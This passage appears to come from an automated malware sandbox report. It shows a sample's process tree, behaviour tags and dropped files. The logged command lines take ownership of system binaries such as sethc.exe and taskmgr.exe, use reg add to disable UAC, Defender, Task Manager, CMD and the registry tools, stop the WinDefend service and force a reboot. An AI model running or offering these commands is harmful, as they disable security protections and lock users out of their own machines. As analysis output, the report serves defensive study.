                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                  PID:4316
                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:3508
                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:3060
                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:4000
                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:3996
                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:2752
                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:4900
                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:2300
                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:2180
                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:3000
                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:760
                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:3840
                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:3140
                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                      PID:2776
                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:1800
                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:1936
                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:1556
                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:2560
                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                              PID:1880
                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:2720
                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:2696
                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                  PID:788
                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:1360
                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:4056
                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:3108
                                                                                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                  takeown /f taskmgr.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:2052
                                                                                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                  takeown /f sethc.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:1824
                                                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "sethc.exe" /granted "Admin":F
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:2160
                                                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "taskmgr.exe" /granted "Admin":F
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:2504
                                                                                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                  takeown /f reg.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:2888
                                                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "reg.exe" /granted "Admin":F
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:3032
                                                                                                                                                                                                                                                                • C:\Windows\system32\takeown.exe
                                                                                                                                                                                                                                                                  takeown /f regedit.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:3060
                                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "regedit.exe" /granted "Admin":F
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:3484
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:4260
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:4768
                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:1936
                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:2792
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                          • UAC bypass
                                                                                                                                                                                                                                                                          PID:3384
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:1880
                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:3520
                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:4916
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:924
                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:3120
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:1416
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                      PID:2768
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:4928
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Modifies system executable filetype association
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:1480
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:3480
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                            sc stop WinDefend
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                                                                            PID:4960
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                            sc config WinDefend start=disabled
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                                                                            PID:1216
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\shutdown.exe
                                                                                                                                                                                                                                                                                            shutdown -r -t 0
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:780
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      PID:900
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x00000000000004F0 0x00000000000004E4
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:3400
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa3936055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:924

                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\69rnspam.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        87KB

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\exec.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        90KB

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\jumpscare.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        87KB

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\killrunas.vbs

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        219B

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\logon_overwrte.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        87KB

  • C:\PerfLogs\windows\rainbow.bat

    Filesize: 320B

  • C:\PerfLogs\windows\rnbowspam.exe

    Filesize: 87KB

  • C:\PerfLogs\windows\tape.mp4

    Filesize: 1.7MB

  • C:\PerfLogs\windows\warn.vbs

    Filesize: 209B

  • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

    Filesize: 1024KB

  • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

    Filesize: 64KB

  • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

    Filesize: 498B

  • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

    Filesize: 9KB

  • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

    Filesize: 9KB

  • C:\Users\Admin\AppData\Local\Temp\A2F7.tmp\A2F8.tmp\A2F9.bat

    Filesize

    3KB

  • C:\Users\Admin\AppData\Local\Temp\A41F.tmp\A420.tmp\A421.bat

    Filesize

    113B

  • C:\Users\Admin\AppData\Local\Temp\A420.tmp\A420.tmp\A421.bat

    Filesize

    158B

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        128B
